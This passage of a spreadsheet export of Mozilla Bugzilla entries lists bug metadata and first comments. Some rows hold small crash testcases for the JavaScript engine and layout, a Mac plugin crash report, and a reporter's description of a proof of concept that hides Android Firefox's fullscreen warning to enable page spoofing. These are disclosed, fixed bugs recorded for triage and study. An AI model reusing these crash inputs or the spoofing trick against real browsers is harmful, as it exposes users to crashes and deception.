        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6451" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6451" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6451" t="inlineStr">
        <is>
          <t>[sg:critical?] (no crash in 3.6.x)</t>
        </is>
      </c>
      <c r="Q6451" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6451" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6451" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6451" t="n">
        <v>1</v>
      </c>
      <c r="U6451" t="n">
        <v>0</v>
      </c>
      <c r="V6451" t="n">
        <v>13</v>
      </c>
      <c r="W6451" t="inlineStr">
        <is>
          <t>It is a new crash signature that first appeared in 4.0b12.
It is #7 top crasher on Mac OS X in 4.0.
Most comments talk about Webex.
Signature	nsNPAPIPluginInstance::GetImage
UUID	cad2d71a-1982-494b-b7a6-5d4f22110324
Time 	2011-03-24 21:48:04.45510
Uptime	91254
Last Crash	9751821 seconds (more than 3 months) before submission
Install Age	450096 seconds (5.2 days) since version was first installed.
Product	Firefox
Version	4.0
Build ID	20110318052756
Branch	2.0
OS	Mac OS X
OS Version	10.5.8 9L31a
CPU	x86
CPU Info	family 6 model 23 stepping 6
Crash Reason	EXC_BAD_ACCESS / KERN_INVALID_ADDRESS
Crash Address	0x6800003d
User Comments	www.xbox.com
App Notes 	Renderers: 0x22600,0x20400
Frame 	Module 	Signature [Expand] 	Source
0 	XUL 	nsNPAPIPluginInstance::GetImage 	modules/plugin/base/src/nsNPAPIPluginInstance.cpp:882
1 	XUL 	nsPluginInstanceOwner::SetCurrentImage 	layout/generic/nsObjectFrame.cpp:2000
2 	XUL 	nsPluginInstanceOwner::InvalidateRect 	layout/generic/nsObjectFrame.cpp:3499
3 	XUL 	nsNPAPIPluginInstance::InvalidateRect 	modules/plugin/base/src/nsNPAPIPluginInstance.cpp:1215
4 	XUL 	mozilla::plugins::parent::_invalidaterect 	modules/plugin/base/src/nsNPAPIPlugin.cpp:1268
5 	agcore 	agcore@0x898e1b 	
6 	agcore 	agcore@0x6520d8 	
7 	agcore 	agcore@0x6632eb 	
8 	agcore 	agcore@0x663f56 	
9 	agcore 	agcore@0x664148 	
10 	CoreFoundation 	__CFRunLoopDoObservers 	
11 	CoreFoundation 	CFRunLoopRunSpecific 	
12 	CoreFoundation 	CFRunLoopRunInMode 	
13 	Foundation 	-[NSRunLoop runMode:beforeDate:] 	
14 	XUL 	nsAppShell::ProcessNextNativeEvent 	widget/src/cocoa/nsAppShell.mm:664
15 	XUL 	nsBaseAppShell::OnProcessNextEvent 	widget/src/xpwidgets/nsBaseAppShell.cpp:173
16 	XUL 	nsAppShell::OnProcessNextEvent 	widget/src/cocoa/nsAppShell.mm:833
17 	XUL 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:597
18 	XUL 	NS_ProcessPendingEvents_P 	nsThreadUtils.cpp:200
19 	XUL 	nsBaseAppShell::NativeEventCallback 	widget/src/xpwidgets/nsBaseAppShell.cpp:132
20 	XUL 	nsAppShell::ProcessGeckoEvents 	widget/src/cocoa/nsAppShell.mm:399
21 	CoreFoundation 	CFRunLoopRunSpecific 	
22 	CoreFoundation 	CFRunLoopRunInMode 	
23 	HIToolbox 	RunCurrentEventLoopInMode 	
24 	HIToolbox 	ReceiveNextEventCommon 	
25 	HIToolbox 	BlockUntilNextEventMatchingListInMode 	
26 	AppKit 	_DPSNextEvent 	
27 	AppKit 	-[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] 	
28 	AppKit 	-[NSApplication run] 	
29 	XUL 	nsAppShell::Run 	widget/src/cocoa/nsAppShell.mm:746
30 	XUL 	nsAppStartup::Run 	toolkit/components/startup/src/nsAppStartup.cpp:220
31 	XUL 	XRE_main 	toolkit/xre/nsAppRunner.cpp:3786
32 	firefox-bin 	main 	browser/app/nsBrowserApp.cpp:158
33 	firefox-bin 	firefox-bin@0xa05 	
34 		@0x1 	
More reports at:
https://crash-stats.mozilla.com/report/list?range_value=4&amp;range_unit=weeks&amp;signature=nsNPAPIPluginInstance%3A%3AGetImage</t>
        </is>
      </c>
      <c r="X6451" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6452">
      <c r="A6452" t="n">
        <v>1417989</v>
      </c>
      <c r="B6452" t="inlineStr">
        <is>
          <t>2017-11-16 09:07:51 -0800</t>
        </is>
      </c>
      <c r="C6452" t="inlineStr">
        <is>
          <t>stackwalker no longer producing loaded symbol paths in output</t>
        </is>
      </c>
      <c r="D6452" t="inlineStr">
        <is>
          <t>2018-04-17 06:16:58 -0700</t>
        </is>
      </c>
      <c r="E6452" t="n">
        <v>1</v>
      </c>
      <c r="F6452" t="n">
        <v>1</v>
      </c>
      <c r="G6452" t="n">
        <v>4</v>
      </c>
      <c r="H6452" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6452" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J6452" t="inlineStr">
        <is>
          <t>Processor</t>
        </is>
      </c>
      <c r="K6452" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6452" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6452" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6452" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6452" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6452" t="inlineStr"/>
      <c r="Q6452" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6452" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6452" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6452" t="n">
        <v>1</v>
      </c>
      <c r="U6452" t="n">
        <v>0</v>
      </c>
      <c r="V6452" t="n">
        <v>5</v>
      </c>
      <c r="W6452" t="inlineStr">
        <is>
          <t>bug 1187852 seems to have regressed at some point. The stackwalker should be putting a "symbol_url" field for modules where we loaded symbols, but it's not:
https://github.com/mozilla-services/socorro/blob/6699bcdc3f5ed1c6a566a9d875ba87fc3463b0e0/minidump-stackwalk/stackwalker.cc#L596
The report/index page will generate links to that URL on the Modules tab, and I noticed they were missing.
Here's a recent crash, processed 2017-11-16 where we definitely loaded symbols for xul.dll:
https://crash-stats.mozilla.com/report/index/b9fbbb0a-03df-42c3-8afa-3f5ee0171116#tab-rawdump
the entry in the modules list in the raw dump shows:
 { "base_addr": "0xf7e0000", "code_id": "5A08599138cd000", "debug_file": "xul.pdb", "debug_id": "3EAC05EF68354302A178E9AF50F214FF2", "end_addr": "0x130ad000", "filename": "xul.dll", "version": "57.0.0.6525" },
Compare vs. an arbitrary crash report from my local machine, processed 2017-10-05:
https://crash-stats.mozilla.com/report/index/bdacddb5-a7aa-47bb-ad74-2666c0171005#tab-rawdump
which has:
 { "base_addr": "0x7ff8a1420000", "code_id": "59D572364834000", "debug_file": "xul.pdb", "debug_id": "F8603BA23173418B9CA4657E2EEB97A12", "end_addr": "0x7ff8a5c54000", "filename": "xul.dll", "loaded_symbols": true, "symbol_disk_cache_hit": true, "symbol_url": "https://s3-us-west-2.amazonaws.com/org.mozilla.crash-stats.symbols-public/v1/xul.pdb/F8603BA23173418B9CA4657E2EEB97A12/xul.sym", "version": "58.0.0.6486" },
So it broke in roughly the last month. Seems possible that it broke in bug 1400952?</t>
        </is>
      </c>
      <c r="X6452" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6453">
      <c r="A6453" t="n">
        <v>1428051</v>
      </c>
      <c r="B6453" t="inlineStr">
        <is>
          <t>2018-01-04 07:00:59 -0800</t>
        </is>
      </c>
      <c r="C6453" t="inlineStr">
        <is>
          <t>Clean up unused Angular DI parameters</t>
        </is>
      </c>
      <c r="D6453" t="inlineStr">
        <is>
          <t>2018-01-07 12:43:00 -0800</t>
        </is>
      </c>
      <c r="E6453" t="n">
        <v>1</v>
      </c>
      <c r="F6453" t="n">
        <v>1</v>
      </c>
      <c r="G6453" t="n">
        <v>7</v>
      </c>
      <c r="H6453" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6453" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6453" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K6453" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6453" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6453" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6453" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6453" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6453" t="inlineStr"/>
      <c r="Q6453" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6453" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6453" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6453" t="n">
        <v>1</v>
      </c>
      <c r="U6453" t="n">
        <v>0</v>
      </c>
      <c r="V6453" t="n">
        <v>4</v>
      </c>
      <c r="W6453" t="inlineStr">
        <is>
          <t>It turns out the unused Angular DI parameters that Jonathan fixed in https://github.com/mozilla/treeherder/pull/3085 were just the tip of the iceberg - there are lots more unused. These can be found with this (too noisy to be used all the time) eslint rule:
'no-unused-vars': ["error", { "args": "all" }],
In addition, there are even some where the injection string array doesn't even match the parameter list, which is pretty bad.
(Note these are things that the angular eslint plugin would help avoid, however I tried using it and it doesn't work with eslint 4, only older versions, so we'll have to wait for it to be fixed: https://github.com/Gillespie59/eslint-plugin-angular/issues/490)</t>
        </is>
      </c>
      <c r="X6453" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6454">
      <c r="A6454" t="n">
        <v>1303678</v>
      </c>
      <c r="B6454" t="inlineStr">
        <is>
          <t>2016-09-19 00:10:49 -0700</t>
        </is>
      </c>
      <c r="C6454" t="inlineStr">
        <is>
          <t>Assertion failure: args.length() &lt;= ARGS_LENGTH_MAX</t>
        </is>
      </c>
      <c r="D6454" t="inlineStr">
        <is>
          <t>2017-11-02 02:46:04 -0700</t>
        </is>
      </c>
      <c r="E6454" t="n">
        <v>1</v>
      </c>
      <c r="F6454" t="n">
        <v>1</v>
      </c>
      <c r="G6454" t="n">
        <v>3</v>
      </c>
      <c r="H6454" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6454" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6454" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6454" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6454" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6454" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6454" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6454" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6454" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+][adv-esr45.5+]</t>
        </is>
      </c>
      <c r="Q6454" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6454" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6454" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T6454" t="n">
        <v>1</v>
      </c>
      <c r="U6454" t="n">
        <v>0</v>
      </c>
      <c r="V6454" t="n">
        <v>24</v>
      </c>
      <c r="W6454" t="inlineStr">
        <is>
          <t>Test case:
---
new (function(){print(arguments.length)}.bind(null, ...Array(300000).fill(0)))(...Array(200000+1).fill(0))
---
Asserts with:
---
Assertion failure: args.length() &lt;= ARGS_LENGTH_MAX, at /home/andre/git/mozilla-central/js/src/vm/Interpreter.cpp:427
---
Back trace:
---
#0  0x0000000000cf9714 in js::InternalCallOrConstruct (cx=0x7ffff6965000, args=..., construct=js::CONSTRUCT)
    at /home/andre/git/mozilla-central/js/src/vm/Interpreter.cpp:427
#1  0x0000000000cfa142 in InternalConstruct (cx=0x7ffff6965000, args=...) at /home/andre/git/mozilla-central/js/src/vm/Interpreter.cpp:548
#2  0x0000000000cfa49f in js::Construct (cx=0x7ffff6965000, fval=..., args=..., newTarget=..., objp=...)
    at /home/andre/git/mozilla-central/js/src/vm/Interpreter.cpp:597
#3  0x0000000000db76cb in intrinsic_ConstructFunction (cx=0x7ffff6965000, argc=3, vp=0x7ffff16142a0)
    at /home/andre/git/mozilla-central/js/src/vm/SelfHosting.cpp:1923
#4  0x0000000000d35afb in js::CallJSNative (cx=0x7ffff6965000, native=0xdb7311 &lt;intrinsic_ConstructFunction(JSContext*, unsigned int, JS::Value*)&gt;, 
    args=...) at /home/andre/git/mozilla-central/js/src/jscntxtinlines.h:235
#5  0x0000000000cf9a0e in js::InternalCallOrConstruct (cx=0x7ffff6965000, args=..., construct=js::NO_CONSTRUCT)
    at /home/andre/git/mozilla-central/js/src/vm/Interpreter.cpp:455
#6  0x0000000000cf9d4f in InternalCall (cx=0x7ffff6965000, args=...) at /home/andre/git/mozilla-central/js/src/vm/Interpreter.cpp:500
#7  0x0000000000cf9d8d in js::CallFromStack (cx=0x7ffff6965000, args=...) at /home/andre/git/mozilla-central/js/src/vm/Interpreter.cpp:506
#8  0x0000000000d075d1 in Interpret (cx=0x7ffff6965000, state=...) at /home/andre/git/mozilla-central/js/src/vm/Interpreter.cpp:2919
#9  0x0000000000cf9667 in js::RunScript (cx=0x7ffff6965000, state=...) at /home/andre/git/mozilla-central/js/src/vm/Interpreter.cpp:401
#10 0x0000000000cf9ace in js::InternalCallOrConstruct (cx=0x7ffff6965000, args=..., construct=js::NO_CONSTRUCT)
    at /home/andre/git/mozilla-central/js/src/vm/Interpreter.cpp:473
#11 0x0000000000cf9d4f in InternalCall (cx=0x7ffff6965000, args=...) at /home/andre/git/mozilla-central/js/src/vm/Interpreter.cpp:500
#12 0x0000000000cf9d8d in js::CallFromStack (cx=0x7ffff6965000, args=...) at /home/andre/git/mozilla-central/js/src/vm/Interpreter.cpp:506
#13 0x000000000117bd50 in js::jit::DoCallFallback (cx=0x7ffff6965000, frame=0x7fffffffa6a8, stub_=0x7ffff69b88c0, argc=3, vp=0x7fffffffa618, res=...)
    at /home/andre/git/mozilla-central/js/src/jit/BaselineIC.cpp:5998
#14 ...
---</t>
        </is>
      </c>
      <c r="X6454" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6455">
      <c r="A6455" t="n">
        <v>688759</v>
      </c>
      <c r="B6455" t="inlineStr">
        <is>
          <t>2011-09-23 07:43:21 -0700</t>
        </is>
      </c>
      <c r="C6455" t="inlineStr">
        <is>
          <t>Bulk compatibility tool ignored binary XPCOM components in 6.* -&gt; 7.* bump</t>
        </is>
      </c>
      <c r="D6455" t="inlineStr">
        <is>
          <t>2016-02-04 14:48:56 -0800</t>
        </is>
      </c>
      <c r="E6455" t="n">
        <v>1</v>
      </c>
      <c r="F6455" t="n">
        <v>1</v>
      </c>
      <c r="G6455" t="n">
        <v>6</v>
      </c>
      <c r="H6455" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6455" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J6455" t="inlineStr">
        <is>
          <t>Compatibility Tools</t>
        </is>
      </c>
      <c r="K6455" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6455" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6455" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6455" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6455" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6455" t="inlineStr">
        <is>
          <t>[needs review][patch]</t>
        </is>
      </c>
      <c r="Q6455" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6455" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6455" t="inlineStr">
        <is>
          <t>6.2.5</t>
        </is>
      </c>
      <c r="T6455" t="n">
        <v>1</v>
      </c>
      <c r="U6455" t="n">
        <v>0</v>
      </c>
      <c r="V6455" t="n">
        <v>9</v>
      </c>
      <c r="W6455" t="inlineStr">
        <is>
          <t>We have received notifications from 2 add-on developers (WebRunner and Input Language Assistant) that say that their add-ons were incorrectly upgraded in the latest compatibility bump.
They both have binary XPCOM components in them, which is something the compatibility tool should be checking for, and I thought worked correctly in previous compatibility bumps.
We need this fixed ASAP. We are planning a 7 -&gt; 8 bump for next week and a 8 -&gt; 9 bump for the following week.</t>
        </is>
      </c>
      <c r="X6455" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6456">
      <c r="A6456" t="n">
        <v>565379</v>
      </c>
      <c r="B6456" t="inlineStr">
        <is>
          <t>2010-05-12 11:07:54 -0700</t>
        </is>
      </c>
      <c r="C6456" t="inlineStr">
        <is>
          <t>New Test Pilot Backend:  Tracking Bug</t>
        </is>
      </c>
      <c r="D6456" t="inlineStr">
        <is>
          <t>2016-05-10 13:13:22 -0700</t>
        </is>
      </c>
      <c r="E6456" t="n">
        <v>1</v>
      </c>
      <c r="F6456" t="n">
        <v>1</v>
      </c>
      <c r="G6456" t="n">
        <v>6</v>
      </c>
      <c r="H6456" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6456" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J6456" t="inlineStr">
        <is>
          <t>Test Pilot</t>
        </is>
      </c>
      <c r="K6456" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6456" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6456" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6456" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6456" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6456" t="inlineStr">
        <is>
          <t>data, server</t>
        </is>
      </c>
      <c r="Q6456" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6456" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6456" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6456" t="n">
        <v>1</v>
      </c>
      <c r="U6456" t="n">
        <v>0</v>
      </c>
      <c r="V6456" t="n">
        <v>3</v>
      </c>
      <c r="W6456" t="inlineStr">
        <is>
          <t>Basho is building us a new scalable database backend for Test Pilot data.  This is the tracking bug for all tasks related to that.  Please file bugs for subtasks and make them blockers on this bug.</t>
        </is>
      </c>
      <c r="X6456" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6457">
      <c r="A6457" t="n">
        <v>454276</v>
      </c>
      <c r="B6457" t="inlineStr">
        <is>
          <t>2008-09-08 13:21:19 -0700</t>
        </is>
      </c>
      <c r="C6457" t="inlineStr">
        <is>
          <t>Crash [@ nsStyleContext::Destroy()] with DOMAttrModified removing window, mathml:apply, iframe and window {display: none} style</t>
        </is>
      </c>
      <c r="D6457" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E6457" t="n">
        <v>1</v>
      </c>
      <c r="F6457" t="n">
        <v>1</v>
      </c>
      <c r="G6457" t="n">
        <v>3</v>
      </c>
      <c r="H6457" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6457" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6457" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K6457" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L6457" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6457" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N6457" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6457" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6457" t="inlineStr">
        <is>
          <t>[sg:nse][no longer sg:crit due to fix for 475128] see comment 24 [needs review]</t>
        </is>
      </c>
      <c r="Q6457" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6457" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6457" t="inlineStr">
        <is>
          <t>mozilla1.9.1b3</t>
        </is>
      </c>
      <c r="T6457" t="n">
        <v>1</v>
      </c>
      <c r="U6457" t="n">
        <v>0</v>
      </c>
      <c r="V6457" t="n">
        <v>53</v>
      </c>
      <c r="W6457" t="inlineStr">
        <is>
          <t>Created attachment 337512
testcase
See testcase, which normally crashes current trunk build very quickly after loading.
It also crashes Firefox 3, but not Firefox 2, it seems.
If wanted, I could look for the regression range.
The iframe source consists of this:
&lt;?xml-stylesheet href="chrome://browser/skin/" type="text/css"?&gt;
&lt;window xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul" xmlns:html="http://www.w3.org/1999/xhtml" xmlns:mathml="http://www.w3.org/1998/Math/MathML"&gt;
&lt;mathml:apply&gt;
  &lt;html:iframe/&gt;
&lt;/mathml:apply&gt;
&lt;html:style&gt;window {display: none;}&lt;/html:style&gt;
&lt;html:marquee/&gt;
&lt;wizardpage/&gt;
&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;
document.documentElement.removeAttributeNode(document.documentElement.attributes[0]);
window.addEventListener('DOMAttrModified', function(e) {window.frameElement.parentNode.removeChild(window.frameElement) }, true);
&lt;/script&gt;
&lt;/window&gt;</t>
        </is>
      </c>
      <c r="X6457" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6458">
      <c r="A6458" t="n">
        <v>839209</v>
      </c>
      <c r="B6458" t="inlineStr">
        <is>
          <t>2013-02-07 12:36:48 -0800</t>
        </is>
      </c>
      <c r="C6458" t="inlineStr">
        <is>
          <t>Assertion failure: kind == GetGCThingTraceKind(*thingp), at gc/Marking.cpp:353</t>
        </is>
      </c>
      <c r="D6458" t="inlineStr">
        <is>
          <t>2013-11-25 13:27:06 -0800</t>
        </is>
      </c>
      <c r="E6458" t="n">
        <v>1</v>
      </c>
      <c r="F6458" t="n">
        <v>1</v>
      </c>
      <c r="G6458" t="n">
        <v>3</v>
      </c>
      <c r="H6458" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6458" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6458" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6458" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6458" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6458" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6458" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6458" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6458" t="inlineStr">
        <is>
          <t>[consider backing out bug 781657] [jsbugmon:update,ignore][adv-main20+]</t>
        </is>
      </c>
      <c r="Q6458" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6458" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6458" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T6458" t="n">
        <v>1</v>
      </c>
      <c r="U6458" t="n">
        <v>0</v>
      </c>
      <c r="V6458" t="n">
        <v>26</v>
      </c>
      <c r="W6458" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision d55669a02834 (no options required):
var N = 100*1000;
function build(N) {
  var chainTop = null;
  for (var i = 0; i != N; ++i) {
    var f = Function('some_arg'+i, ' return /test/;');
    var re = f();
    (f)     = chainTop;
  }
}
var chainTop = build(N);</t>
        </is>
      </c>
      <c r="X6458" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6459">
      <c r="A6459" t="n">
        <v>1816059</v>
      </c>
      <c r="B6459" t="inlineStr">
        <is>
          <t>2023-02-10 00:36:09 -0800</t>
        </is>
      </c>
      <c r="C6459" t="inlineStr">
        <is>
          <t>Obscuring the Full-Screen Toast in Android Through the Select Tag</t>
        </is>
      </c>
      <c r="D6459" t="inlineStr">
        <is>
          <t>2024-05-30 11:05:16 -0700</t>
        </is>
      </c>
      <c r="E6459" t="n">
        <v>1</v>
      </c>
      <c r="F6459" t="n">
        <v>1</v>
      </c>
      <c r="G6459" t="n">
        <v>2</v>
      </c>
      <c r="H6459" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6459" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J6459" t="inlineStr">
        <is>
          <t>Browser Engine</t>
        </is>
      </c>
      <c r="K6459" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6459" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6459" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6459" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6459" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6459" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][geckoview:m113?]  [adv-main112+]</t>
        </is>
      </c>
      <c r="Q6459" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6459" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6459" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T6459" t="n">
        <v>1</v>
      </c>
      <c r="U6459" t="n">
        <v>0</v>
      </c>
      <c r="V6459" t="n">
        <v>30</v>
      </c>
      <c r="W6459" t="inlineStr">
        <is>
          <t>Created attachment 9316962
poc.rar
In the Firefox Android (Fenix) browser, an attacker can conceal full-screen toast notifications using the following method. 
I recently reported a similar method that uses a URI to launch an external app prompt to hide the Full-Screen Toast (https://bugzilla.mozilla.org/show_bug.cgi?id=1816007). This is a similar method, but it uses internal HTML elements such as the 'select' tag to obscure the full-screen toast from the victim.
When the victim clicks the button, the following proof-of-concept (POC) triggers the launch of Select Option and Fullscreen simultaneously. This obscures the full-screen toast and loads a spoofed page in the background.
Steps to Reproduce:
1. Download and extract the file `poc.rar` to a folder
2. Start a Python server on the same folder by running the command `python -m http.server 8080`.
3. Open the Android Firefox browser and navigate to the server at `http://{YOUR-SERVER-IP}:8080/poc.html` to Begin testing.
Video Demonstration: https://youtu.be/kBPErXr197w (YouTube Unlisted)</t>
        </is>
      </c>
      <c r="X6459" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6460">
      <c r="A6460" t="n">
        <v>140110</v>
      </c>
      <c r="B6460" t="inlineStr">
        <is>
          <t>2002-04-25 12:15:41 -0700</t>
        </is>
      </c>
      <c r="C6460" t="inlineStr">
        <is>
          <t>Remove redundant code from CGI.pl</t>
        </is>
      </c>
      <c r="D6460" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:29 -0800</t>
        </is>
      </c>
      <c r="E6460" t="n">
        <v>1</v>
      </c>
      <c r="F6460" t="n">
        <v>1</v>
      </c>
      <c r="G6460" t="n">
        <v>4</v>
      </c>
      <c r="H6460" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6460" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6460" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K6460" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L6460" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6460" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6460" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6460" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6460" t="inlineStr"/>
      <c r="Q6460" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6460" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6460" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T6460" t="n">
        <v>1</v>
      </c>
      <c r="U6460" t="n">
        <v>0</v>
      </c>
      <c r="V6460" t="n">
        <v>5</v>
      </c>
      <c r="W6460" t="inlineStr">
        <is>
          <t>Post-templatisation, there is a _load_ of redundant code in CGI.pl that no-one
uses. Given that this file is instantiated every time we run a CGI, removing it
all must be a perf win of some sort. And it also makes what's going on a lot
clearer.
Gerv</t>
        </is>
      </c>
